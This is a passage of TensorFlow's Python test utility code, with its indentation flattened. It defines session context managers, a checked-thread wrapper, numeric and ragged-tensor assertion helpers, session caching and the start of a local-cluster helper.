if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=True, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session():
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session() as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=True,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
